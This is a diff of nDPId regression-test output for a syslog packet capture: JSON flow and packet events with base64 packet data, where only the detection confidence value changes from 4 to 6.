-00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"syslog.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1488571038380,"flow_last_seen":1488571189276,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1557406275511,"l3_proto":"ip4","src_ip":"192.168.121.10","dst_ip":"192.168.120.10","src_port":50080,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"syslog.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1488571330521,"flow_last_seen":1488571330522,"flow_idle_time":200000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1557406275511,"l3_proto":"ip4","src_ip":"192.168.121.2","dst_ip":"192.168.120.10","src_port":50352,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"syslog.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1488571038380,"flow_last_seen":1488571189276,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1557406275511,"l3_proto":"ip4","src_ip":"192.168.121.10","dst_ip":"192.168.120.10","src_port":50080,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 01096{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"syslog.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1557406279481,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":537,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":537,"pkt_l4_len":503,"thread_ts_msec":1557406279481,"pkt":"ABDb\/xAAACFZH\/EMCABFAAILd7sAAIAp7jbBGOMK2EJWcmAAAAABzxFAIAEEcABsAKEAAAAAAAAAAiABBHB2WwAAAAAAAAsVACKVDwICAc8p5DwxMzM+c3NnOiBOZXRTY3JlZW4gZGV2aWNlX2lkPTAxODUwODIwMDgwMDE1NDEgIFtSb290XXN5c3RlbS1ub3RpZmljYXRpb24tMDAyNTcodHJhZmZpYyk6IHN0YXJ0X3RpbWU9IjIwMTktMDUtMDkgMTQ6NTA6MTgiIGR1cmF0aW9uPTYxIHBvbGljeV9pZD04IHNlcnZpY2U9TmV0d29yayBUaW1lIHByb3RvPTE3IHNyYyB6b25lPVVudHJ1c3QgZHN0IHpvbmU9VHJ1c3QgYWN0aW9uPVBlcm1pdCBzZW50PTE1NCByY3ZkPTEzNCBzcmM9MjAwMTo0NzA6MWYwYToxMDFhOjoyIGRzdD0yMDAxOjQ3MDo2ZDphMTo6ZGNmYjoxMjMgc3JjX3BvcnQ9MTIzIGRzdF9wb3J0PTEyMyBzcmMteGxhdGVkIGlwPTIwMDE6NDcwOjFmMGE6MTAxYTo6MiBwb3J0PTEyMyBkc3QteGxhdGVkIGlwPTIwMDE6NDcwOjZkOmExOjpkY2ZiOjEyMyBwb3J0PTEyMyBzZXNzaW9uX2lkPTQ4MDU2IHJlYXNvbj1DbG9zZSAtIEFHRSBPVVQA"} 01095{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"syslog.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1557406279497,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":537,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":537,"pkt_l4_len":503,"thread_ts_msec":1557406279497,"pkt":"ABRpnhFAABDb\/xAACABFAAILsN5AAPspAGXYQlAewRjjDGAAAAABzxE7IAEEcABsAKEAAAAAAAAAAiABBHB2WwAAAAAAAAsVACKVDwICAc8p5DwxMzM+c3NnOiBOZXRTY3JlZW4gZGV2aWNlX2lkPTAxODUwODIwMDgwMDE1NDEgIFtSb290XXN5c3RlbS1ub3RpZmljYXRpb24tMDAyNTcodHJhZmZpYyk6IHN0YXJ0X3RpbWU9IjIwMTktMDUtMDkgMTQ6NTA6MTgiIGR1cmF0aW9uPTYxIHBvbGljeV9pZD04IHNlcnZpY2U9TmV0d29yayBUaW1lIHByb3RvPTE3IHNyYyB6b25lPVVudHJ1c3QgZHN0IHpvbmU9VHJ1c3QgYWN0aW9uPVBlcm1pdCBzZW50PTE1NCByY3ZkPTEzNCBzcmM9MjAwMTo0NzA6MWYwYToxMDFhOjoyIGRzdD0yMDAxOjQ3MDo2ZDphMTo6ZGNmYjoxMjMgc3JjX3BvcnQ9MTIzIGRzdF9wb3J0PTEyMyBzcmMteGxhdGVkIGlwPTIwMDE6NDcwOjFmMGE6MTAxYTo6MiBwb3J0PTEyMyBkc3QteGxhdGVkIGlwPTIwMDE6NDcwOjZkOmExOjpkY2ZiOjEyMyBwb3J0PTEyMyBzZXNzaW9uX2lkPTQ4MDU2IHJlYXNvbj1DbG9zZSAtIEFHRSBPVVQA"} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":32,"source":"syslog.pcap","alias":"nDPId-test","packets-captured":32,"packets-processed":29,"total-skipped-flows":0,"total-l4-payload-len":5976,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":1,"current-active-flows":2,"total-active-flows":6,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":41,"global_ts_msec":1600781689297} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"syslog.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600781689297,"flow_last_seen":1600781689297,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1600781689297,"l3_proto":"ip4","src_ip":"172.21.251.36","dst_ip":"172.19.196.11","src_port":62679,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"syslog.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1600781689297,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":124,"pkt_l4_len":90,"thread_ts_msec":1600781689297,"pkt":"qrvMbk9eqrvMlgwFCABFAABuAAAAAP8RpCWsFfskrBPEC\/TXAgIAWrkePDE4OT4zMDogKlNlcCAyMiAxMzozNDo0OS4xOTU6ICVTWVMtNS1DT05GSUdfSTogQ29uZmlndXJlZCBmcm9tIGNvbnNvbGUgYnkgY29uc29sZQ=="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"syslog.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600781689297,"flow_last_seen":1600781689297,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1600781689297,"l3_proto":"ip4","src_ip":"172.21.251.36","dst_ip":"172.19.196.11","src_port":62679,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"syslog.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600781689297,"flow_last_seen":1600781689297,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1600781689297,"l3_proto":"ip4","src_ip":"172.21.251.36","dst_ip":"172.19.196.11","src_port":62679,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00595{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"syslog.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1600781690282,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":160,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":160,"pkt_l4_len":126,"thread_ts_msec":1600781690282,"pkt":"qrvMbk9eqrvMlgwFCABFAACSAAEAAP8RpACsFfskrBPEC\/TXAgIAfpjBPDE5MD4zMTogKlNlcCAyMiAxMzozNDo0OS4yMjA6ICVTWVMtNi1MT0dHSU5HSE9TVF9TVEFSVFNUT1A6IExvZ2dpbmcgdG8gaG9zdCAxMC4xLjIuMiBwb3J0IDUxNCBzdGFydGVkIC0gQ0xJIGluaXRpYXRlZA=="} 00564{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":34,"source":"syslog.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1557406267510,"flow_last_seen":1557406279497,"flow_idle_time":620000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":1395,"flow_avg_l4_payload_len":465,"midstream":0,"thread_ts_msec":1600781690282,"l3_proto":"ip4","src_ip":"216.66.80.30","dst_ip":"193.24.227.12","l4_proto":41,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00549{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"syslog.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1557406267510,"flow_last_seen":1557406279497,"flow_idle_time":620000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":1395,"flow_avg_l4_payload_len":465,"midstream":0,"thread_ts_msec":1600781690282,"l3_proto":"ip4","src_ip":"216.66.80.30","dst_ip":"193.24.227.12","l4_proto":41,"flow_datalink":1,"flow_max_packets":3} @@ -49,61 +49,61 @@ 00550{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"syslog.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1557406267494,"flow_last_seen":1557406279481,"flow_idle_time":620000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":1395,"flow_avg_l4_payload_len":465,"midstream":0,"thread_ts_msec":1600781690282,"l3_proto":"ip4","src_ip":"193.24.227.10","dst_ip":"216.66.86.114","l4_proto":41,"flow_datalink":1,"flow_max_packets":3} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"syslog.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600781776117,"flow_last_seen":1600781776117,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1600781776117,"l3_proto":"ip4","src_ip":"192.168.72.140","dst_ip":"192.168.178.148","src_port":62679,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"syslog.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1600781776117,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":158,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":158,"pkt_l4_len":124,"thread_ts_msec":1600781776117,"pkt":"qrvMXnUpqrvMO4StCABFAACQAAMAAP8RPujAqEiMwKiylPTXAgIAfAzhPDE0PjMzOiAqU2VwIDIyIDEzOjM2OjE1LjMwODogJVNZUy02LUxPR0dJTkdIT1NUX1NUQVJUU1RPUDogTG9nZ2luZyB0byBob3N0IDEwLjEuMi4yIHBvcnQgNTE0IHJlc3RvcmVkIENMSSBpbml0aWF0ZWQ="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"syslog.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600781776117,"flow_last_seen":1600781776117,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1600781776117,"l3_proto":"ip4","src_ip":"192.168.72.140","dst_ip":"192.168.178.148","src_port":62679,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"syslog.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600781776117,"flow_last_seen":1600781776117,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1600781776117,"l3_proto":"ip4","src_ip":"192.168.72.140","dst_ip":"192.168.178.148","src_port":62679,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"syslog.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1600781777157,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":1600781777157,"pkt":"qrvMXnUpqrvMO4StCABFAABtAAQAAP8RPwrAqEiMwKiylPTXAgIAWZ\/\/PDEzPjM0OiAqU2VwIDIyIDEzOjM2OjE2LjA5MTogJVNZUy01LUNPTkZJR19JOiBDb25maWd1cmVkIGZyb20gY29uc29sZSBieSBjb25zb2xl"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"syslog.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600781952293,"flow_last_seen":1600781952293,"flow_idle_time":200000,"flow_min_l4_payload_len":93,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":93,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1600781952293,"l3_proto":"ip4","src_ip":"192.168.67.241","dst_ip":"10.193.53.6","src_port":62679,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00558{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"syslog.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1600781952293,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":135,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":135,"pkt_l4_len":101,"thread_ts_msec":1600781952293,"pkt":"qrvMySBnqrvMPDqhCABFAAB5AAgAAP8RdwvAqEPxCsE1BvTXAgIAZVTQPDE4Nz4zODogUjE6ICpTZXAgMjIgMTM6Mzk6MTEuMjUwOiAlTElOSy0zLVVQRE9XTjogSW50ZXJmYWNlIEV0aGVybmV0MC8yLCBjaGFuZ2VkIHN0YXRlIHRvIHVw"} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"syslog.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600781952293,"flow_last_seen":1600781952293,"flow_idle_time":200000,"flow_min_l4_payload_len":93,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":93,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1600781952293,"l3_proto":"ip4","src_ip":"192.168.67.241","dst_ip":"10.193.53.6","src_port":62679,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"syslog.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600781952293,"flow_last_seen":1600781952293,"flow_idle_time":200000,"flow_min_l4_payload_len":93,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":93,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1600781952293,"l3_proto":"ip4","src_ip":"192.168.67.241","dst_ip":"10.193.53.6","src_port":62679,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00590{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"syslog.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1600781952293,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"thread_ts_msec":1600781952293,"pkt":"qrvMySBnqrvMPDqhCABFAACPAAkAAP8RdvTAqEPxCsE1BvTXAgIAe0jbPDE4OT4zOTogUjE6ICpTZXAgMjIgMTM6Mzk6MTIuMjUyOiAlTElORVBST1RPLTUtVVBET1dOOiBMaW5lIHByb3RvY29sIG9uIEludGVyZmFjZSBFdGhlcm5ldDAvMiwgY2hhbmdlZCBzdGF0ZSB0byB1cA=="} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"syslog.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1600781689297,"flow_last_seen":1600781690282,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":118,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1600781952293,"l3_proto":"ip4","src_ip":"172.21.251.36","dst_ip":"172.19.196.11","src_port":62679,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"syslog.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1600781689297,"flow_last_seen":1600781690282,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":118,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1600781952293,"l3_proto":"ip4","src_ip":"172.21.251.36","dst_ip":"172.19.196.11","src_port":62679,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":38,"source":"syslog.pcap","alias":"nDPId-test","packets-captured":38,"packets-processed":35,"total-skipped-flows":0,"total-l4-payload-len":6581,"total-not-detected-flows":2,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":1,"current-active-flows":2,"total-active-flows":9,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":59,"global_ts_msec":1600782411853} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"syslog.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782411853,"flow_last_seen":1600782411853,"flow_idle_time":200000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":0,"thread_ts_msec":1600782411853,"l3_proto":"ip4","src_ip":"192.168.126.102","dst_ip":"172.19.177.230","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"syslog.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1600782411853,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":1600782411853,"pkt":"qrvMCetCqrvMS9ZJCABFAAFMAAAAAP8RHZjAqH5mrBOx5t9OAgIBOHsYPDE5MD44MjogUjE6IFtzeXNsb2dAOSBzX3NuPSIxIl06IDxpb3MtbG9nLW1zZz48ZmFjaWxpdHk+U1lTPC9mYWNpbGl0eT48c2V2ZXJpdHk+Njwvc2V2ZXJpdHk+PG1zZy1pZD5MT0dHSU5HSE9TVF9TVEFSVFNUT1A8L21zZy1pZD48dGltZT4qU2VwIDIyIDEzOjQ2OjUwLjgxMjwvdGltZT48YXJncz48YXJnIGlkPSIwIj4xMC4xLjIuMjwvYXJnPjxhcmcgaWQ9IjEiPiBwb3J0IDUxNDwvYXJnPjxhcmcgaWQ9IjIiPjwvYXJnPjxhcmcgaWQ9IjMiPiBzdGFydGVkIC0gQ0xJIGluaXRpYXRlZDwvYXJnPjwvYXJncz48L2lvcy1sb2ctbXNnPg=="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"syslog.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782411853,"flow_last_seen":1600782411853,"flow_idle_time":200000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":0,"thread_ts_msec":1600782411853,"l3_proto":"ip4","src_ip":"192.168.126.102","dst_ip":"172.19.177.230","src_port":57166,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"syslog.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1600781776117,"flow_last_seen":1600781777157,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1600782411853,"l3_proto":"ip4","src_ip":"192.168.72.140","dst_ip":"192.168.178.148","src_port":62679,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"syslog.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1600781952293,"flow_last_seen":1600781952293,"flow_idle_time":200000,"flow_min_l4_payload_len":93,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1600782411853,"l3_proto":"ip4","src_ip":"192.168.67.241","dst_ip":"10.193.53.6","src_port":62679,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"syslog.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782411853,"flow_last_seen":1600782411853,"flow_idle_time":200000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":0,"thread_ts_msec":1600782411853,"l3_proto":"ip4","src_ip":"192.168.126.102","dst_ip":"172.19.177.230","src_port":57166,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"syslog.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1600781776117,"flow_last_seen":1600781777157,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1600782411853,"l3_proto":"ip4","src_ip":"192.168.72.140","dst_ip":"192.168.178.148","src_port":62679,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"syslog.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1600781952293,"flow_last_seen":1600781952293,"flow_idle_time":200000,"flow_min_l4_payload_len":93,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1600782411853,"l3_proto":"ip4","src_ip":"192.168.67.241","dst_ip":"10.193.53.6","src_port":62679,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00739{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"syslog.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1600782437280,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":268,"pkt_l4_len":234,"thread_ts_msec":1600782437280,"pkt":"qrvMCetCqrvMS9ZJCABFAAD+AAEAAP8RHeXAqH5mrBOx5t9OAgIA6uDbPDE4Nz44MzogUjE6IFtzeXNsb2dAOSBzX3NuPSIyIl06IDxpb3MtbG9nLW1zZz48ZmFjaWxpdHk+TElOSzwvZmFjaWxpdHk+PHNldmVyaXR5PjM8L3NldmVyaXR5Pjxtc2ctaWQ+VVBET1dOPC9tc2ctaWQ+PHRpbWU+KlNlcCAyMiAxMzo0NzoxNi40MDQ8L3RpbWU+PGFyZ3M+PGFyZyBpZD0iMCI+RXRoZXJuZXQwLzM8L2FyZz48YXJnIGlkPSIxIj51cDwvYXJnPjwvYXJncz48L2lvcy1sb2ctbXNnPg=="} 00739{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"syslog.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1600782437466,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":270,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":270,"pkt_l4_len":236,"thread_ts_msec":1600782437466,"pkt":"qrvMCetCqrvMS9ZJCABFAAEAAAIAAP8RHeLAqH5mrBOx5t9OAgIA7NFUPDE4OT44NDogUjE6IFtzeXNsb2dAOSBzX3NuPSIzIl06IDxpb3MtbG9nLW1zZz48ZmFjaWxpdHk+U1lTPC9mYWNpbGl0eT48c2V2ZXJpdHk+NTwvc2V2ZXJpdHk+PG1zZy1pZD5DT05GSUdfSTwvbXNnLWlkPjx0aW1lPipTZXAgMjIgMTM6NDc6MTcuMTk2PC90aW1lPjxhcmdzPjxhcmcgaWQ9IjAiPmNvbnNvbGU8L2FyZz48YXJnIGlkPSIxIj5jb25zb2xlPC9hcmc+PC9hcmdzPjwvaW9zLWxvZy1tc2c+"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"syslog.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782466695,"flow_last_seen":1600782466695,"flow_idle_time":200000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1600782466695,"l3_proto":"ip4","src_ip":"10.22.179.215","dst_ip":"172.26.54.76","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 